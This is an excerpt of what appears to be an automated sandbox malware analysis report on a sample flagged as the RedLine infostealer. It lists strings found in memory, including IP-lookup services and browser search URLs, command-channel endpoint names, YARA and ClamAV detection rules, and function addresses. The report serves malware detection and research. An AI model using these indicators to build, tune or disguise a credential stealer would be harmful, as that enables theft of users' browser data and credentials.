                    Source: l2rMtmFkD6.exe, ECcZgk.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003364000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2099262418.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000B.00000002.2193981753.0000000002711000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: l2rMtmFkD6.exe, ECcZgk.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: ECcZgk.exe, 0000000E.00000002.2314976048.000000000335A000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003270000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003364000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: l2rMtmFkD6.exe, l2rMtmFkD6.exe, 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECcZgk.exe, 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: l2rMtmFkD6.exe, l2rMtmFkD6.exe, 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECcZgk.exe, 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: l2rMtmFkD6.exe, l2rMtmFkD6.exe, 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECcZgk.exe, 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: l2rMtmFkD6.exe, ECcZgk.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: l2rMtmFkD6.exe PID: 6156, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: l2rMtmFkD6.exe PID: 3524, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: ECcZgk.exe PID: 1848, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_00CBDF4C0_2_00CBDF4C
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4E0490_2_05C4E049
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C452490_2_05C45249
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C486880_2_05C48688
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C482500_2_05C48250
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C49D600_2_05C49D60
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C47E170_2_05C47E17
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C47E180_2_05C47E18
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C48AC00_2_05C48AC0
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_090E0BF00_2_090E0BF0
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 8_2_014DE7B08_2_014DE7B0
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 8_2_014DDC908_2_014DDC90
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 8_2_069696308_2_06969630
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 8_2_069637208_2_06963720
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 8_2_069644688_2_06964468
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 8_2_0696D5288_2_0696D528
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 8_2_069612108_2_06961210
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 8_2_0696DA308_2_0696DA30
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_0259DF4C11_2_0259DF4C
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_04CC77F811_2_04CC77F8
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_04CC004011_2_04CC0040
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_04CC000711_2_04CC0007
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_05D1D2EB11_2_05D1D2EB
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_05D1524B11_2_05D1524B
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_05D1868811_2_05D18688
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_05D1825011_2_05D18250
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_05D19D6011_2_05D19D60
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_05D17E1811_2_05D17E18
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_05D18AC011_2_05D18AC0
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 14_2_0300E7B014_2_0300E7B0
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 14_2_0300DC9014_2_0300DC90
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 14_2_06AC963014_2_06AC9630
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 14_2_06AC372014_2_06AC3720
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 14_2_06AC446814_2_06AC4468
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 14_2_06AC121014_2_06AC1210
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 14_2_06ACDA3014_2_06ACDA30
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 14_2_06ACD14014_2_06ACD140
                    Source: l2rMtmFkD6.exeStatic PE information: invalid certificate
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2098275898.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2102080907.0000000005A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2099262418.00000000029A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2103869192.0000000005F90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000000.00000000.2009996260.00000000005C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefwvZ.exe8 vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2099262418.0000000002ACD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\000004B0\\OriginalFilename vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\080904B0\\OriginalFilename vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exeBinary or memory string: OriginalFilenamefwvZ.exe8 vs l2rMtmFkD6.exe
                    Source: l2rMtmFkD6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
